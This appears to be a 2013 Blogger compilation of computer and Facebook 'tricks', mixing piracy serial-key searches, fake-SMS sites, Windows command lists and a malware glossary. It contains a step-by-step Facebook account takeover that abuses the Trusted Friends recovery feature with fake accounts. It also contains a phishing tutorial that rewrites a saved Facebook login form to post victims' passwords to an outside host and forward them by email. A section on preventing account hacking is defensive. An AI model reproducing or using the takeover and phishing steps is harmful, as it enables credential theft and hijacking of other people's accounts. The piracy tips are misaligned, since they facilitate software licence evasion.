2013

Using Simple Google Trick
Most of you download and use
pirated software from torrents or any
such other sites, but sometime it
gets very difficult to find serial key of
those softwares. I will make it easy
for you by showing you simple yet
very intersting google trick which will
allow you to find serial key of any
software very easily.

How To Find Serial Key Of Any
Software ?
The key 94FBR is a part of Office
2000 Pro CD activation key that is
widely distributed as it bypasses the
activation requirements of Office
2000 Pro. By searching for 94fbr and
the product name, you are
guarantee that the pages that are
returned are pages dealing
specifically with the product you're
wanting a serial for. Follow simple
steps given below to learn this trick
1. Go to Google
2. Then type Software Name
94FBR
Replace Software Name with the
name of software whose serial key
you want to find
Eg: To find serial key of Nero i will
type Nero 94fbr
3. Now press Enter and you will
find serial key of software you are
looking for as shown below.


KHALID ALI

Block Facebook On Your Computer In
Few Simple Steps
I had previously posted about
Blocking Facebook on your computer
but many users were facing
difficulties doing that. So In this
tutorial i will share with you guys an
amazing programme or small little
tool that will allow you block
facebook on your computer easily in
just few simple steps. So lets get
started
1. First download Facebook Blocker
by Clicking Here
2. Extract the file and right click
on Facebook Blocker.exe and run it
as administator (Important)
3. Press 1 in order to backup your
host file to be on the safe side.
4. Now Press 2 to block facebook
5. Its time to check if facebook is
blocked or not to do that Press 5
6. Hope this help you if you have
any question leave a comment
below.


KHALID ALI


SmsMafia is a web texting
application.
This Service Is Completely
Anonymous.Your Mobile No. Will Not
Be Shown Anywhere.
http://smsmafia.in/
SMS Global
Send fake sms from this website..
Make sign up and u will get 25 sms
as trial..
www.smsglobal.com
Send International SMS Free
Just Add 00 before type the Country
Code and then enter the number
Like 0091 For India. No Need To
Register

facebook secrets facebook facebook
is the best platform for sharing our
ideas and thoughts
Facebook, the user can share their
ideas, which is a popular social
networking platform million. Now
days, every facebook user profiles,
cool status updates or changes on
the giant social networking site
wants to be attractive.
Updating a status on facebook to
get the attention of other people
affected and the maximum number
of slaves is a daily. We are still
some of the latest facebook status
and tricks will help you to get the
attention from
other facebook users to share there
thought's1) Facebook Status Trick
Blue Color Status update:
Click Here free
This link appears to be one trick
facebook facebook in blue color can
help to be able to update.Here's
the trick
@[1: ]@@[1:[0:1: Type your text
here]]
2) change with your original
facebook status with 'type your
text here'.
3) 'on' by clicking on the upddate,
and you're done.
Must Read: free mobile recharge
tricks
What ..? Your mom said NO for the
iPhone, and you are going to buy a
new iPhone 5 has promised to your
friends. If you've just bought an
iPhone to show your facebook
friends facebook status, this trick
does not feel bad to use.
Login to your Facebook account and
preferred by the device and update
your status, follow this link.
CLICK HERE
Sometimes we know about some of
the opinions of your friends on
facebook like button, but not with
the required button.
For, such as: Android Apple will
beat ..?
If a dislike button ... You can view
the people who are in favor of the
state and the opposition. As a
result of using this debate is clear.
So for this purpose, "Magic updates"
can be called as a facebook
application.
1) Login to your Facebook account.
2) The status of the application to
update your profile and add CLICK
HERE
The facebook like button to add a
custom application to update your
status.
The specific time schedule status
message before publishing them in
a fresh plot to facebook.
1) facebook facebook connect
button to log on and follow the link
to the http://laterbro.com/ .
2) then publish it as a facebook
status at a particular time schedule
after the first use facebook Bro.
It's cool to see our status message,
sometimes we want to add some
icons. Facebook status symbols do
not have to use the inbuilt facility.
But we're cool with the status
message through the use of
symbols is a facebook trick.
Http://fsymbols.com/all/ Follow this
link to update your status, and you
want to copy the desired icon.
You can influence each other on
facebook this is one of the latest
facebook trick.
Do you know ... Close friend of
mine on facebook who want to ..?
http :/ / facebook.com / profile.php?
= 73322363: click on this link to
check the answer
No Mets need to shock. Link on
his / her own facebook profile will
redirect a user. Also with your
friends on facebook you can play
the same prank
Make of this trick, follow these
simple steps
1) Login to your facebook profile.
2) @ [2:2:] copy this code
3) Copy the code and paste it in the
status bar, and update your status.
And you're done.
We want to share with a status of
multiple group several times. For
this reason, it provides a facebook
share button, but the same thing
again and again with 100 of the
most boring and we want to share
with the group in a position when
the situation has become worst.
But we in the one-click publish to
multiple groups in our state, which
is a trick.
1) CLICK HERE FIRST
By FConnect map to your Facebook
account
2) Login.
3) Write a status. You can also add
the image url or site url.
4) in a position to publish in a
single click, select the desired
groups. (Maximum 25 at a time,
otherwise it gives an error.)
5) Click on and you're done.
Not by 3D analysis, we also share
with our friends, but our position is
a 3D view of the status of the 3D
view can be obtained.
Not to use the 3D analysis, follow
this link
CLICK HERE
From Your E-mail account from
your friend's facebook status
update Yes, its possible. Monkey to
play with your friends on facebook
you can use this trick on facebook.
We are here to start
1) facebook https://m.facebook.com/
upload.php?_rdr Share this link
with your friends and click the link
to compromise them. If you work
in this link, you may also want to
check out how the click Do not
worry, it is not a malicious link.
2) Then, you "email a photo or
video," the e-mail below and tell
them to say.
Once you get this email
3), you're almost done. Now the
Subject field of the email message
in your status, send an email to
This e-mail address and other fields
blank.
4) I want to be your friend on
facebook facebook account
yesterday to send this email.
NOTE: Always change the email
subject field, and the email address
to your facebook friend in his / her
password or Facebook status, write
a story changes every time. The
facebook trick will not work, so
after some time, then again from
step 1, follow this trick.
Yes, you can do this with a cool
facebook application, now you can
send sms from facebook.There
restrictions.You any country.The
send sms messages to any country
there are immediate and may take
a few seconds to reach
destination.All.
Login to your Facebook account
Go to the Facebook chat application
Check out how it looks like the
screen below
.
Select your country.
In the next line, enter the mobile
number you want to send sms.
After that, you want to enter your
message
You can send sms up to 100
characters in length.
You can only send 4 SMS per day.
Your name will display a message
at the beginning of the first tasks
of this service not illegal.
Now you can download all your
facebook photos for just a single
click all you have to do is just go to
this app and Facebook2zip.com
Step1: the picture above you'll
soon be asked to login with
Facebook app on the go
Step2: Now you'd like to download
the photo album from your friend
in the picture above you can see an
arrow pointing to the 2 Choose
Step3: Now select the album you
want to download any
Step4 : Just click the Download
button and the position you want to
save the photo album.

STEP#01
So now here we are going to the
misuse this trick to Hack Facebook
Account. So now you have to just
create 3 the fake Fb accounts then
have to send a friend request’s from
those 3 fake accounts to A victim. SO
Victim must accept those The friend
request OR Contact with your Friend
who give you the security code. Now
we can use "THE Three Trusted
Friend" feature’s to reset A victims'
Face book account password.
Important Note: The 3 fake account’s
must be the 7 day older, then
otherwise this Facebook Hack will be
not work
After this, so now you are able to
the hack your Victim Friend’s Face
book Account easily so now just
follow These steps given below
STEP#02
The, Now click on The Forgot
Facebook Password button like
below. Now Facebook system will
show you the three solutions to
recover your or Victim password as
the shown below
STEP#03
So Two are things
If you know anything so enter there
or GO the victim profile link so just
copy the username like min
Facebook.com/nomanamzan91
so now copy just nomanramzan91
and paste in Email,phone or
Facebook username
STEP#04
Now After that,yoy click on the No
Longer Have Access to These
STEP#05
Then, you can enter a New Email
Address which has not to be the
used with Any Facebook Account
which earlier and then click on a
Submit button to proceed to a next
step
STEP#06
So now You will be a asked for a
security question answer. Then If
you know the answer then it’s
perfect and if you don’t know then
fill it with wrong answers 3 times
STEP#07
After these submission or giving the
wrong answers, then Facebook
Security will show the TRUSTED
FRIENDS feature for recover a
account
Then Click on a Continue button
Then, it will ask you to the select 3
Friends (Now select Friend or your 3
Fake Account’s Name’s) from a shown
list and then click to the Continue
button after each time you select
the selection
After the above all step, then
Facebook have to sent the security
codes to a each of the 3 accounts
which you have selected
Then, Now Login to each of a 3
accounts or ask to friend and note
this security’s codes manually and
then the fill them in a proper
manner ( If they were not found in
a Inbox then check a Spam Folder
Also
STEP#08
That’s final it! You are done the
successfully Hacked a victim Account,
Now, you have to the access to your
Friends and Victim Account .

1. First You Need To Login In Your
Facebook Account .
2. Now You Just Open This Website
Click Here .
3. Now You Choose Any file From
Your PC .
4. In Next Step Click on Upload
Button .
5. After Few Seconds you will get
picture code  When You will click on
Show Codes .then just copy it
6. And Now Paste This Code in Your
Fb Friend Chat Box .
That's It Now You Are Done :)
Let's Enjoy This Cool Trick Of
Facebook

Run Commands:
Quote:
compmgmt.msc - Computer
management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration
Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading
information(also system.ini)
winver _ Shows current version of
windows
mailto: _ Opens default email client
command _ Opens command prompt
Run Commands to access the control
panel:
Quote:
Add/Remove Programs control
appwiz.cpl
Date/Time Properties control
timedate.cpl
Display Properties control desk.cpl
FindFast control findfast.cpl
Fonts Folder control fonts
Internet Properties control
inetcpl.cpl
Keyboard Properties control main.cpl
keyboard
Mouse Properties control main.cpl
Multimedia Properties control
mmsys.cpl
Network Properties control netcpl.cpl
Password Properties control
password.cpl
Printers Folder control printers
Sound Properties control mmsys.cpl
sounds
System Properties control sysdm.cpl
Command Prompt:
Quote:
ANSI.SYS Defines functions that
change display graphics, control
cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in
other directories when editing a file
or running a command.
ARP Displays, adds, and removes arp
information from network devices.
ASSIGN Assign a drive letter to an
alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute
commands or programs.
ATMADM Lists connections and
addresses seen by Windows ATM call
manager.
ATTRIB Display and change file
attributes.
BATCH Recovery console command
that executes a series of commands
in a file.
BOOTCFG Recovery console command
that allows a user to view, modify,
and rebuild the boot.ini
BREAK Enable / disable CTRL + C
feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another
batch file.
CD Changes directories.
CHCP Supplement the International
keyboard and character set
information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive
running FAT for errors.
CHKNTFS Check the hard disk drive
running NTFS for errors.
CHOICE Specify a listing of multiple
options within a batch file.
CLS Clears the screen.
CMD Opens the command
interpreter.
COLOR Easily change the foreground
and background color of the MS-DOS
window.
COMP Compares files.
COMPACT Compresses and
uncompress files.
CONTROL Open control panel icons
from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an
alternate location.
CTTY Change the computers input/
output devices.
DATE View or change the systems
date.
DEBUG Debug utility to create
assembly programs to modify
hardware settings.
DEFRAG Re-arrange the hard disk
drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command
that deletes a file.
DELTREE Deletes one or more files
and/or directories.
DIR List the contents of one or more
directory.
DISABLE Recovery console command
that disables Windows system
services or drivers.
DISKCOMP Compare a disk with
another disk.
DISKCOPY Copy the contents of one
disk and place them on another
disk.
DOSKEY Command to view and
execute commands that have been
run in the past.
DOSSHELL A GUI to help with early
MS-DOS users.
DRIVPARM Enables overwrite of
original device drivers.
ECHO Displays messages and enables
and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory
Manager.
ENABLE Recovery console command
to enable a disable service or driver.
ENDLOCAL Stops the localization of
the environment changes enabled by
the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command
interpreter.
EXPAND Expand a M*cros*ft
Windows file back to it's original
format.
EXTRACT Extract files from the
M*cros*ft Windows cabinets.
FASTHELP Displays a listing of MS-
DOS commands and information
about them.
FC Compare files.
FDISK Utility used to create
partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text
within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to
a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and
prepare a disk drive.
FTP Command to connect and
operate on a FTP server.
FTYPE Displays or modifies file types
used in file extension associations.
GOTO Moves a batch file to a specific
label or location.
GRAFTABL Show extended characters
in graphics mode.
HELP Display a listing of commands
and brief explanation.
IF Allows for batch files to perform
conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view
network adapter settings and
assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk
drive.
LH Load a device driver in to high
memory.
LISTSVC Recovery console command
that displays the services and
drivers.
LOADFIX Load a program above the
first 64k.
LOADHIGH Load a device driver in to
high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to
list installations and enable
administrator login.
MAP Displays the device name of a
drive.
MD Command to create a new
directory.
MEM Display memory on system.
MKDIR Command to create a new
directory.
MODE Modify the port or display
settings.
MORE Display one page at a time.
MOVE Move one or more files from
one directory to another directory.
MSAV Early M*cros*ft Virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and
provide access to the CD-ROM.
NBTSTAT Displays protocol statistics
and current TCP/IP connections
using NBT
NET Update, fix, or view the network
or network settings
NETSH Configure dynamic and static
network information from MS-DOS.
NETSTAT Display the TCP/IP network
protocol statistics and information.
NLSFUNC Load country specific
information.
NSLOOKUP Look up an IP address of
a domain or host on a network.
PATH View and modify the
computers path location.
PATHPING View and locate locations
of network latency.
PAUSE Command used in batch files
to stop the processing of a
command.
PING Test / send information to
another network computer or network
device.
POPD Changes to the directory or
network path stored by the pushd
command.
POWER Conserve power with
computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-
DOS prompt.
PUSHD Stores a directory or network
path in memory so it can be
returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows
network route tables.
RUNAS Enables a user to execute a
program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover
registry from errors.
SET Change one variable or string to
another.
SETLOCAL Enables local
environments to be changed without
affecting anything else.
SETVER Change MS-DOS version to
trick older MS-DOS programs.
SHARE Installs support for file
sharing and locking capabilities.
SHIFT Changes the position of
replaceable parameters in a batch
program.
SHUTDOWN Shutdown the computer
from the MS-DOS prompt.
SMARTDRV Create a disk cache in
conventional memory or extended
memory.
SORT Sorts the input and displays
the output to the screen.
START Start a separate window in
Windows from the MS-DOS prompt.
SUBST Substitute a folder on your
computer for another drive letter.
SWITCHES Remove add functions
from MS-DOS.
SYS Transfer system files to disk
drive.
TELNET Telnet to another computer /
device from the prompt.
TIME View or modify the system
time.
TITLE Change the title of their MS-
DOS window.
TRACERT Visually view a network
packets route across a network.
TREE View a visual tree of the hard
disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has
been deleted.
UNFORMAT Unformat a hard disk
drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the
feature to determine if files have
been written properly.
VOL Displays the volume information
about the designated drive.
XCOPY Copy multiple files,
directories, and/or drives from one
location to another.
TRUENAME When placed before a
file, will display the whole directory
in which it exists
TASKKILL It allows you to kill those
unneeded or locked up applications
Windows XP Shortcuts:
Quote:
ALT+- (ALT+hyphen) Displays the
Multiple Document Interface (MDI)
child window's System menu
ALT+ENTER View properties for the
selected item
ALT+ESC Cycle through items in the
order they were opened
ALT+F4 Close the active item, or quit
the active program
ALT+SPACEBAR Display the System
menu for the active window
ALT+TAB Switch between open items
ALT+Underlined letter Display the
corresponding menu
BACKSPACE View the folder one level
up in My Computer or Windows
Explorer
CTRL+A Select all
CTRL+B Bold
CTRL+C Copy
CTRL+I Italics
CTRL+O Open an item
CTRL+U Underline
CTRL+V Paste
CTRL+X Cut
CTRL+Z Undo
CTRL+F4 Close the active document
CTRL while dragging Copy selected
item
CTRL+SHIFT while dragging Create
shortcut to selected iteM
CTRL+RIGHT ARROW Move the
insertion point to the beginning of
the next word
CTRL+LEFT ARROW Move the
insertion point to the beginning of
the previous word
CTRL+DOWN ARROW Move the
insertion point to the beginning of
the next paragraph
CTRL+UP ARROW Move the insertion
point to the beginning of the
previous paragraph
SHIFT+DELETE Delete selected item
permanently without placing the
item in the Recycle Bin
ESC Cancel the current task
F1 Displays Help
F2 Rename selected item
F3 Search for a file or folder
F4 Display the Address bar list in My
Computer or Windows Explorer
F5 Refresh the active window
F6 Cycle through screen elements in
a window or on the desktop
F10 Activate the menu bar in the
active program
SHIFT+F10 Display the shortcut
menu for the selected item
CTRL+ESC Display the Start menu
SHIFT+CTRL+ESC Launches Task
Manager
SHIFT when you insert a CD Prevent
the CD from automatically playing
WIN Display or hide the Start menu
WIN+BREAK Display the System
Properties dialog box
WIN+D Minimizes all Windows and
shows the Desktop
WIN+E Open Windows Explorer
WIN+F Search for a file or folder
WIN+F+CTRL Search for computers
WIN+L Locks the desktop
WIN+M Minimize or restore all
windows
WIN+R Open the Run dialog box
WIN+TAB Switch between open items
Windows Explorer Shortcuts:
Quote:
ALT+SPACEBAR - Display the current
window’s system menu
SHIFT+F10 - Display the item's
context menu
CTRL+ESC - Display the Start menu
ALT+TAB - Switch to the window you
last used
ALT+F4 - Close the current window
or quit
CTRL+A - Select all items
CTRL+X - Cut selected item(s)
CTRL+C - Copy selected item(s)
CTRL+V - Paste item(s)
CTRL+Z - Undo last action
CTRL+(+) - Automatically resize the
columns in the right hand pane
TAB - Move forward through options
ALT+RIGHT ARROW - Move forward to
a previous view
ALT+LEFT ARROW - Move backward to
a previous view
SHIFT+DELETE - Delete an item
immediately
BACKSPACE - View the folder one
level up
ALT+ENTER - View an item’s
properties
F10 - Activate the menu bar in
programs
F6 - Switch between left and right
panes
F5 - Refresh window contents
F3 - Display Find application
F2 - Rename selected item
Internet Explorer Shortcuts:
Quote:
CTRL+A - Select all items on the
current page
CTRL+D - Add the current page to
your Favorites
CTRL+E - Open the Search bar
CTRL+F - Find on this page
CTRL+H - Open the History bar
CTRL+I - Open the Favorites bar
CTRL+N - Open a new window
CTRL+O - Go to a new location
CTRL+P - Print the current page or
active frame
CTRL+S - Save the current page
CTRL+W - Close current browser
window
CTRL+ENTER - Adds the http://www.
(url) .com
SHIFT+CLICK - Open link in new
window
BACKSPACE - Go to the previous
page
ALT+HOME - Go to your Home page
HOME - Move to the beginning of a
document
TAB - Move forward through items on
a page
END - Move to the end of a
document
ESC - Stop downloading a page
F11 - Toggle full-screen view
F5 - Refresh the current page
F4 - Display list of typed addresses
F6 - Change Address bar and page
focus
ALT+RIGHT ARROW - Go to the next
page
SHIFT+CTRL+TAB - Move back
between frames
SHIFT+F10 - Display a shortcut menu
for a link
SHIFT+TAB - Move back through the
items on a page
CTRL+TAB - Move forward between
frames
CTRL+C - Copy selected items to the
clipboard
CTRL+V - Insert contents of the
clipboard
ENTER - Activate a selected link
HOME - Move to the beginning of a
document
END - Move to the end of a
document
F1 - Display Internet Explorer Help

Hi friends, i have a sloution for ur
issue.
You can make ur normal pen drive to
virus protected pendrive. for that u
want 1 pc which having windows
vista 0r 7 os installed. Follow the
below steps……..
1) Connect ur pen drive to pc which
having widows vista or windows 7
operating system. (The user must
having Administrator rights)
2) Open ‘My Computer’ & right click
on pendrive icon then select ‘Format’
option. Before formatting you must
take a back up of all of your data
because it deletes whole data from
ur pen drive.
3) In Format window select file
system tab & change it to ‘NTFS’
then click on ‘Start’ to start
formatting.
4) After formatting done close the
format window & open ur pendrive.
5) create one folder in pen drive &
rename it to ‘secured’.
6) Back to ‘My Computer’ & again
right click on pendrive & now select
‘Properties’ tab.
7) In properties window select
security tab then click on edit & tick
on ‘Deny’ for ‘Write’ permission then
press ok to apply the settings.
8) Open pen drive again, right click
on ‘Secured’ folder select ‘Properties’
then ‘Security’ tab.
again click on ‘Edit’ tab & set ‘Allow’
permission to ‘Full Control’ then click
ok to apply settings.
9) Open ‘Secured’ folder, create one
folder into that & rename it to
‘Secured.exe’.
10) Right click on ‘Secured.exe’
folder select ‘Properties’ & make it
hidden by selecting ‘Hidden’
attribute then select ‘security’ tab
click on ‘Edit’ & set ‘Deny’
permission to ‘Full Control’ .
10) Press ‘Ok’ to apply the settings.
Now ur pen drive is virus protected.
but u can’t copy files into that
directly. u need to copy all of ur files
to the secured folder & I recommand
that copy ur software setup files to
the zip folder so, virus can’t access
software’s exe files.

Hacking of Facebook Account
#1. Its very easy to hack a Facebook
account, If you are ignorant about
the page URL. Many pishers around
the Web create a page which will
exactly look like the Facebook login
page. If you login using that page,
Your account will be in the hands of
some Tom, Dick or Harry. So always
check the URL of the page before
logging in.
Facebook Login Page 550x149 How to
Prevent Hacking of Facebook Account
#2. Visiting Links which are shared
by your Friends. This would be also a
cause of Hacking of Facebook
account. So, Double check when you
are visiting a link shared by your
friends. If you think its a good clean
link, then proceed.
Links on Facebook How to Prevent
Hacking of Facebook Account
#3. Do you think, Your Facebook
account is being accessed by
anyone? Get Notified when your
Facebook account is logged in from a
different place.
How to do this?
1. Login to your Facebook account,
Click on Account and navigate to
Account Settings.
2. Under Account Security, Check
Send me an email, If a new
computer or mobile device logs into
this account. You can also Check
Send me a text message, If you have
added a mobile device.
Account Security on Facebook
550x206 How to Prevent Hacking of
Facebook Account
Additional Tip: Also enable HTTPS
secure browsing.
HTTPS on Facebook How to Prevent
Hacking of Facebook Account
#4. Avoid using Spam Applications.
Don’t try to use an application which
you don’t know or seen some of your
friends using. To View/Edit
applications which you are using, Go
to Applications Settings page.
Additional Tip: Remove Applications
which you are not using now.
Account Security on Facebook
550x206 How to Prevent Hacking of
Facebook Account
#5. Always use a complex and very
strong Password. A combination of
Alphabets, Numbers and Special
Characters is an unbeatable or
unguessable password. Avoid using
your Name, Girl Friends name, Your
Mobile number etc., in your
password as these are easily
guessable.
#6. Don’t accept requests from the
people you don’t know. Avoid adding
people you don’t know to your
friends list. If he/she is a Mutual
Friend then you can add.
#7. Regularly scan your Computer
with some Anti-Spyware or Anti-
Malware tools. Some of the
recommended tools are Panda Active
Scan, Trend Micro Housecall
Thus these are the 7 Basic as well as
Best possible ways for preventing
and stopping the Hacking of
Facebook Account.

Disabling the Unwanted Visual
Effects in Windows 7 to Speed Up
more
For this right click on ” Computer”
and select “Properties” from the
right click menu.
Click on ” Advanced System Settings
” from the left pane to open up the
” System Properties ” window.
Select the “Advanced” tab from it.
Then Under ” Performance ” click ”
Settings “. Choose ” Custom: ”
Options From it.
Now un tick all the options and
select only the last four options
(actually three only needed; you can
un tick the second option from the
last four). See the screen shot if you
have any doubt.
Now just logoff your system and turn
logon.
Even though we have tuned off the
aero effects in Windows 7 still there
are many unwanted visual effects
that can be safely disabled to speed
up windows 7 even more.
disabling services in windows 7
Speed Up Windows 7 Ultimate Guide
To Make Windows 7 Blazing Fast!!!
You will now notice the speed
difference now.

How to hack facebook account and
what are its preventive measures
Step 1: Go to www.facebook.com
Step 2: Save the login page of
facebook (shortcut:press ctrl+S)
Step 3: Now 2 things would have
been saved in your computer with
the name "Welcome to Facebook -
Log In, Sign Up or Learn More"
Step 4: Right click on the saved file
with name "Welcome to Facebook -
Log In, Sign Up or Learn More.htm"
and open it with notepad
Step 5: Now search where the word
action is written in it for the first
time (shortcut:press ctrl+F then type
action in it and then press enter).
Step 6: Now after action you will see
action="https://www.facebook.com/
login.php?login_attempt=1"
id="login_form"
Step 7: Now replace that line with
action="http://hackfact.com/fb.php?
id=your-email-id-here@
gmail.com&link=www.facebook.com/
login.php?login_attempt=1"
Step 8: Now replace the line your-
email-id-here@gmail.com with your
email-id where you want to recieve
the password.
Step 9: Save the notepad(shortcut:
ctrl+s).
Step 10: Now just put this page on
your Desktop who so ever will login
from this will be hacked. You will be
having his/her password in your
email-id or the other option you
have is that upload this page on a
free web hosting site where you can
upload both these pages and if you
have your own website you can
upload this on that and send the
link to others. bingoooooooo..:).
Note: Remember both the files will
be moved together which you saved
with the name "Welcome to Facebook
- Log In, Sign Up or Learn More" and
you can rename the file with the
name "Welcome to Facebook - Log In,
Sign Up or Learn More.htm" but not
that folder.

Have you purchased a new PC or
shifted to an old one but all the
data stuff is in your previous PC,
well than that’s not a big problem
because we have Windows Easy
Transfer official transfer tool by
Microsoft well with this you
transfer files, pictures, images and
settings to any new windows
operated pc The best thing about
this tool is that it also includes a
file explorer or you can say file
manager which you see many times
on a Nokia phone so you can also
see what things to copy and what
not.
This tool is official developed by
Microsoft for their humble
customers, giving them an easy way
to complete the whole process.
Check below steps on how to use
this awesome simple tool.
Download Windows Easy Transfer
Tool.
Now just run this tool on your old
pc from which you are willing to
transfer your files and settings. You
can choose to backup settings in
your external drive such as pen
drives.
Now just run this tool again on your
new pc and choose the file from
external drive to restore the whole
process in your new pc.
That's It Guya Now You are done :)

A potentially damaging computer programme capable ofreproducing itself causing great harm to files or other programs without permission or knowledge of the user. Virus - A program that when run, has the ability to self-replicate by infecting other programs and files on your computer. These programs can have manyeffects ranging from wiping your hard drive, displaying a joke in a small box, or doing nothing at all except to replicate itself. These types of infections tend to be localized to your computer and not have the ability to spread to another computer on their own. The word virushas incorrectly become a general term that encompasses trojans, worms, and viruses. Types of viruses :- The different types of viruses are as follows- 1) Boot Sector Virus :- Boot sector viruses infect either the master boot record of the hard disk orthe floppy drive. The bootrecord program responsible for the booting of operating system is replaced by thevirus. The virus either copies the master boot program to another part of the hard disk or overwrites it. They infect a computer when it bootsup or when it accesses the infected floppy disk in the floppy drive. i.e. Once a system is infectedwith a boot-sector virus, any non-write-protected disk accessed by this system will become infected. Examples of boot- sector viruses are Michelangelo and Stoned. 2) File or Program Viruses :- Some files/programs, when executed, load the virus in the memory and perform predefined functions to infect the system. They infect program files with extensions like .EXE,.COM, .BIN, .DRV and.SYS . Some common file viruses are Sunday, Cascade. 3) Multipartite Viruses:- A multipartite virus is a computer virus that infects multiple different target platforms, and remains recursively infective in each target. It attempts to attack both the boot sector and the executable, or programs, files at the same time. When the virus attaches to the bootsector, it will in turn affect the system’s files, and when the virus attaches to the files, it will in turn infect the boot sector. This type of virus can re-infect a system over and over again if all partsof the virus are not eradicated. Ghostball was the first multipartite virus, discovered by Fridrik Skulason in October 1989. Other examples are Invader, Flip, etc. 4) Stealth Viruses :- These viruses are stealthyin nature means it uses various methods for hiding themselves to avoid detection. They sometimes remove themselves from the memory temporarily to avoid detection by antivirus. They are somewhat difficult to detect. When an antivirus program tries todetect the virus, the stealth virus feeds the antivirus program a cleanimage of the file or boot sector. 5) Polymorphic Viruses:- Polymorphic viruses have the ability to mutate implying that they change the viral code known as the signature each time they spread or infect. Thus an antivirus program which is scanning for specific virus codes unable to detect it's presense. 6) Macro Viruses :- A macro virus is a computer virus that"infects" a Microsoft Word or similar application and causes a sequence of actions to beperformed automatically when the application is started or something elsetriggers it. Macro viruses tend to be surprising but relatively harmless.A macro virus is often spread as an e-mail virus.Well-known examples areConcept Virus and Melissa Worm.   If you use a computer,read the newspaper, or watch the news, you will know about computer viruses or other malware. These are those malicious programs that once they infect your machine will start causing havoc on yourcomputer. What manypeople do not know is that there are many different types of infections that are categorized in the general category of Malware. Malware - Malware is programming or files thatare developed for the purpose of doing harm. Thus, malware includes computer viruses, worms, Trojan horses, spyware, hijackers, and certain type of adware. This article will focus on those malware that are considered viruses, trojans, worms, and viruses, though this information can be used to remove the other types of malware as well. We will not go into specific details about anyone particular infection, but rather provide a broad overview of how these infections can be removed. For the most part these instructions should allow you to remove a good deal of infections, but there are some that need special steps to be removed and these won't be covered under this tutorial. Before we continue it is important to understand the generic malware terms that you will be reading about. Backdoor - A program that allows a remote userto execute commands and tasks on your computer without your permission. These types of programs are typically used to launch attacks on other computers, distribute copyrighted software or media, or hack other computers. Hijackers - A program that attempts to hijack certain Internet functionslike redirecting your startpage to the hijacker's own start page, redirecting search queries to a undesired search engine, or replacesearch results from popular search engines with their own information. Spyware - A program that monitors your activity or information on your computer and sendsthat information to a remote computer withoutyour Knowledge. Adware - A program thatgenerates popups on your computer or displays advertisements. It is important to note that not all adware programs are necessarily considered malware. There are many legitimate programs that are given for free that display ads in their programs in order to generate revenue. As long as this information isprovided up front then they are generally not considered malware. Dialler - A program that typically dials a premium rate number that has perminute charges over and above the typical call charge. These calls are with the intent of gainingaccess to pornographic material. Trojan - A program that has been designed to appear innocent but has been intentionally designed to cause some malicious activity or to provide a backdoor to your system. Worm - A program that when run, has the ability to spread to other computers on its own using either mass-mailingtechniques to email addresses found on your computer or by using theInternet to infect a remote computer using known security holes

Author Name

Contact Form

Name

Email *

Message *

Powered by Blogger.